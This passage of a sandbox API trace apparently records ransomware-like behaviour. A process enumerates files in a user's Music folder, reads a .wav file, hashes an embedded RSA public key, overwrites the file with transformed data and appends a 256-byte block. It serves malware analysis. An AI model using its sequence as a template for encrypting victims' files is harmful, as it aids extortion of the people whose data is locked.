hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0198.048] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0198.052] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9406330, ftCreationTime.dwHighDateTime=0x1d8a3ec, ftLastAccessTime.dwLowDateTime=0x4155cc30, ftLastAccessTime.dwHighDateTime=0x1d8a4d9, ftLastWriteTime.dwLowDateTime=0x4155cc30, ftLastWriteTime.dwHighDateTime=0x1d8a4d9, nFileSizeHigh=0x0, nFileSizeLow=0xcc96, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d4OMzSyCrSqIiU9aYvRY.wav", cAlternateFileName="D4OMZS~1.WAV")) returned 1 [0198.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edcf8 [0198.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.053] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\d4OMzSyCrSqIiU9aYvRY.wav") returned=".wav" [0198.053] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\d4OMzSyCrSqIiU9aYvRY.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\zntr-yrixj\\d4omzsycrsqiiu9ayvry.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0198.055] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=52374) returned 1 [0198.055] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0198.059] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xcc70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.060] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0198.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0198.062] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.062] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xcc96, lpOverlapped=0x0) returned 1 [0198.063] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0198.063] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.063] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.063] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0198.064] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0198.064] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.065] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0198.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0198.065] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0198.065] GetLastError () returned 0x0 [0198.065] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0198.065] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0198.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.065] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0198.065] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0198.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.065] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0198.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0198.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0198.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xcca0) returned 0x2af5168 [0198.066] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0198.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0198.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0198.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea9f8 [0198.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6830 [0198.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeaa40 [0198.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6848 [0198.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6878 [0198.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68d8 [0198.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6890 [0198.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0198.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0198.067] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0198.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0198.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6878 | out: hHeap=0x2c0000) returned 1 [0198.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6890 | out: hHeap=0x2c0000) returned 1 [0198.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68d8 | out: hHeap=0x2c0000) returned 1 [0198.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0198.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68d8 [0198.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0198.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6890 [0198.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0198.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6878 [0198.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0198.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0198.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0198.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0198.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0198.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0198.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0198.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6890 | out: hHeap=0x2c0000) returned 1 [0198.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6878 | out: hHeap=0x2c0000) returned 1 [0198.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68d8 | out: hHeap=0x2c0000) returned 1 [0198.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0198.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0198.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0198.071] GetCurrentThreadId () returned 0x5d8 [0198.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0198.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2db0 [0198.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0198.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0198.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0198.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0198.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.072] GetCurrentThreadId () returned 0x5d8 [0198.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0198.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0198.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0198.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0198.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68d8 [0198.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0198.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0198.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0198.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6878 [0198.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0198.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0198.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0198.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0198.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6890 [0198.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0198.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0198.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0198.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6860 [0198.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0198.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68f0 [0198.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0198.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68c0 [0198.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68a8 [0198.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6908 [0198.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68a8 | out: hHeap=0x2c0000) returned 1 [0198.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68a8 [0198.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68c0 | out: hHeap=0x2c0000) returned 1 [0198.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0198.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0198.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0198.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6878 | out: hHeap=0x2c0000) returned 1 [0198.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6878 [0198.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0198.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68d8 | out: hHeap=0x2c0000) returned 1 [0198.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0198.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6908 | out: hHeap=0x2c0000) returned 1 [0198.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0198.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0198.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0198.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0198.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6878 | out: hHeap=0x2c0000) returned 1 [0198.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0198.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0198.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0198.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0198.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0198.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0198.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0198.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0198.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0198.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0198.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68a8 | out: hHeap=0x2c0000) returned 1 [0198.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68f0 | out: hHeap=0x2c0000) returned 1 [0198.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6890 | out: hHeap=0x2c0000) returned 1 [0198.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6860 | out: hHeap=0x2c0000) returned 1 [0198.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0198.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0198.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6848 | out: hHeap=0x2c0000) returned 1 [0198.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaa40 | out: hHeap=0x2c0000) returned 1 [0198.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0198.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0198.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0198.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0198.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0198.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.089] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xcc91, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xcc91, lpOverlapped=0x0) returned 1 [0198.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0198.090] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xcc96, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.090] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.090] HeapFree (in: 